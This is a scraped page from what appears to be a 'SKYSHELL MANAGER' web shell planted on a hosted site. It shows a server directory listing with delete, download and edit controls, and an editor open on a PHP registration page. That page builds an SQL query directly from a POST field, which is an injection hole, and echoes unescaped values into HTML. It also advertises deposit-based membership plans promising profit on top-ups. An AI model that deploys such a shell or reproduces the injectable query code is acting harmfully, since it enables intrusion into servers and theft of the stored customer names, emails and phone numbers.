📁
SKYSHELL MANAGER-
🛒
PHP v7.4.33
Create Folder
Create File
Current Path:
home
/
oshofree
/
public_html
/
chbluxuries.com
/
boot
/
Name
Size
Permissions
Actions
📁
..
-
0755
🗑️
🔒
📁
css
-
0755
🗑️
🔒
📁
js
-
0755
🗑️
🔒
📄
config.php
7.06 KB
0444
🗑️
⬇️
✏️
🔒
📄
error_log
149.27 KB
0644
🗑️
⬇️
✏️
🔒
Editing: waler.php
<?php session_start(); include "regus.php"; ?><?php include "header.php"; ?> <body onLoad="getLocation()"> <!-- ======= Header ======= --> <header id="header" class="fixed-top"> <div class="container d-flex align-items-center"> <h1 class="logo mr-auto"><a href="index.php"><img src="assets/img/apple-touch-icon.png"/></a></h1> <!-- Uncomment below if you prefer to use an image logo --> <!-- <a href="index.html" class="logo mr-auto"><img src="assets/img/logo.png" alt="" class="img-fluid"></a>--> <nav class="nav-menu d-none d-lg-block"> <ul> <li><a class="nav-link scrollto active" href="index.php">Home</a></li> <li><a class="nav-link scrollto " href="track.php">Track Order</a></li> <li><a class="nav-link scrollto" href="part.php">Bike Hire</a></li> <li><a class="nav-link scrollto" href="book.php">Member Portal</a></li> <li><a class="nav-link scrollto" href="faq.php">FAQ</a></li> <li><a class="nav-link scrollto" href="incon.php">Contact Us</a></li> <li><a class="nav-link scrollto" href="compa.php">Report Issues</a></li> </ul> </nav><!-- .nav-menu --> </div> </header><!-- End Header --> <main id="main"> <?php include "connect_to_mysqli.php"; $pod=$_POST['wid']; $sql = "SELECT * from parcel where id = '".$pod."' "; $sql2 = mysqli_query($con,$sql); while($row = mysqli_fetch_array($sql2)) { $id = $row["s"]; $nome = $row['name']; $ema = $row['email']; $pah = $row['phone']; } $parts = explode(" ",$nome); $one = $parts[0]; $two = $parts[1]; $pod=$_POST['wid']; ?> <!-- ======= Track and Book Section ======= --> <section id="about" class="about"> <div class="container" data-aos="fade-up"> <div class="row content" align="center";> <div class="col-lg-6" style="margin: auto; width: 100%;"> <p><a href="wale.php"><button style=" border:0; color: #FFFFFF; outline:0; background:transparent; border-bottom:2px solid #FF0096;">SIGN IN</button></a><button style=" border:0; color: #FFFFFF; outline:0; background:#FF0096;border-bottom:2px solid #FF0096;">SIGN UP</button></p> <form method="post" enctype="multipart/form-data"> <p> <input type="text" class="form-control" placeholder="*Your First Name" name="fa" value="<?php echo $one;?>" required></p> <p><input type="text" class="form-control" placeholder="*Your Last Name" name="la" value="<?php echo $two;?>" required></p> <p><input type="email" class="form-control" placeholder="*Your Email" name="ma" value="<?php echo $ema;?>" required><p style="color:#fff;" > <?php global $chk; echo "$chk"; ?></p></p> <p><input type="tel" class="form-control" placeholder="*Your Phone Number" name="ta" value="<?php echo $pah;?>" required><p style="color:#fff;" > <input value="<?php echo $pod ?>" style="border:0; color:#FFFFFF; width:400px; outline:0; background:transparent; border-bottom:2px solid #FF0096;" placeholder="*Enter Password" name="wide" required hidden readonly > <?php global $re; echo "$re"; ?></p></p> <p><input type="password" class="form-control" placeholder="*Enter Password" name="pa" required><p style="color:#fff;" > <?php global $rrs; echo "$rrs"; ?></p></p> <p><input type="password" class="form-control" placeholder="*Enter Password Again" name="pas" required><p style="color:#fff;" > <?php global $rrs; echo "$rr"; ?></p></p> <p><label for="file">Choose Profile Picture - Optional</label><input type="file" name="file" > <br ><span style="color:#FF0096; font-size:10px;">(Only images less than 2mb allowed) </span><?php global $statusMsg; echo "$statusMsg"; ?></p> <p> <section id="pricing" class="pricing"> <div class="row"> <div class="col-lg-4 col-md-6 mt-4 mt-lg-0" data-aos="zoom-in" data-aos-delay="100"> <div class="box" style="color:#FF339A;"> <p><input type="radio" name="me" class="form-control" value="Good" required />Click here to select this plan</p> <h3 style="color:#fff; background-color:#FF339A; width:100%;">GOOD MEMBERSHIP PLAN</h3> <p>10,000 naira Compulsory Deposit</p> <p> 10% off every order</p> <p> Each Wallet Toppup is rewarded with 1% profit of deposit</p> </div> </div> <div class="col-lg-4 col-md-6 mt-4 mt-md-0" data-aos="zoom-in" data-aos-delay="100"> <div class="box featured" style="background-color:#FF339A;"> <p><input type="radio" name="me" class="form-control" value="Better" required />Click here to select this plan</p> <h3 style="background-color:#fff; color:#FF339A; width:100%;">BETTER MEMBERSHIP PLAN</h3> <p>20,000 naira Compulsory Deposit</p> <p> 20% off every order</p> <p> Each Wallet Toppup is rewarded with 1% profit of deposit</p> </div> </div> <div class="col-lg-4 col-md-6 mt-4 mt-lg-0" data-aos="zoom-in" data-aos-delay="100"> <div class="box" style="color:#FF339A;"> <p><input type="radio" name="me" class="form-control" value="Best" required />Click here to select this plan</p> <h3 style="color:#fff; background-color:#FF339A; width:100%;">BEST MEMBERSHIP PLAN</h3> <p>50,000 naira Compulsory Deposit</p> <p> 40% off every order</p> <p> Each Wallet Toppup is rewarded with 1% profit of deposit</p> </div> </div> </div> </section></p> <p><input class="form-check-input" type="checkbox" name="agree" value="yes" required> <a href="terms.php" style="color:#FF339A;"><u> Terms and Condition </u></a> </input></p> <p><input type="submit" name="submit" value="Register" class="submitn" required /></form></p> </div> </div> </section><!-- Book Section --> </main><!-- End #main --> <?php include "footer.php"; ?>
💾 Save Changes